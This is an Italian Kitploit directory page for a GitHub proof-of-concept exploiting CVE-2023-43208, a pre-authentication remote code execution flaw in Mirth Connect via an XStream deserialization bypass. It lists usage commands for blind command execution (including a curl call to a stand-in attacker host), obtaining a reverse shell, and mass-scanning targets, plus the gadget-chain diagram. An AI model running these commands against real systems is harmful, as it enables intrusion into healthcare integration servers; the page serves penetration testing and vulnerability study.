Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43208 — CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC | Kitploit
Strumenti/GitHubGitHub/kyakei/cve-2023-43208
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubkyakei/cve-2023-43208

CVE-2023-43208

CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC

Vedi Repository
3116 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-43208 — Mirth Connect RCE Pre-Autenticazione

Esecuzione remota di codice pre-autenticata in NextGen Healthcare Mirth Connect < 4.4.1 tramite bypass di deserializzazione XStream.

CVSS 9.8 (Critico) — Bypass della patch di CVE-2023-37679

Panoramica

Mirth Connect utilizza la libreria Java XStream per deserializzare payload XML sull'endpoint /api/users senza autenticazione. La correzione originale (CVE-2023-37679) ha introdotto una lista nera di classi pericolose, ma è stata aggirata utilizzando EventBindingInvocationHandler di Apache Commons Lang3 combinato con la catena InvokerTransformer di Commons Collections4.

Corretto in Mirth Connect 4.4.1 passando da lista nera a lista bianca.

Requisiti

root@kitploit:~
pip install requests

Python 3.10+ (usa istruzioni match).

Utilizzo

Scarica lo strumento

Verifica se un target è vulnerabile

root@kitploit:~
python3 exploit.py check -t https://target:8443

Esegui un comando (RCE cieco — nessun output)

root@kitploit:~
python3 exploit.py exec -t https://target:8443 -c "id"
python3 exploit.py exec -t https://target:8443 -c "curl http://attacker/pwned"

Ottieni una reverse shell

root@kitploit:~
# Terminale 1 (o lascia che lo script gestisca il listener):
python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

# Per una migliore esperienza di shell, usa rlwrap:
rlwrap python3 exploit.py shell -t https://target:8443 --lhost 10.10.10.10 --lport 4444

Scansiona più target

root@kitploit:~
python3 exploit.py scan -f targets.txt -o vulnerable.txt -T 30

Catena dell'attacco

root@kitploit:~
POST /api/users  (nessuna autenticazione)
     │
     ▼
XStream deserializza payload XML
     │
     ▼
sorted-set attiva Comparable.compareTo()
     │
     ▼
dynamic-proxy → EventBindingInvocationHandler (aggira la lista nera)
     │
     ▼
ChainedTransformer.transform()
     │
     ▼
ConstantTransformer(Runtime.class)
  → InvokerTransformer("getRuntime")
    → InvokerTransformer("invoke")
      → InvokerTransformer("exec", <comando>)
           │
           ▼
Esecuzione del comando OS come utente del servizio Mirth Connect

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre l'autorizzazione appropriata prima di eseguire test.

Riferimenti

  • NVD — CVE-2023-43208
  • Horizon3.ai — Analisi
  • Catalogo CISA KEV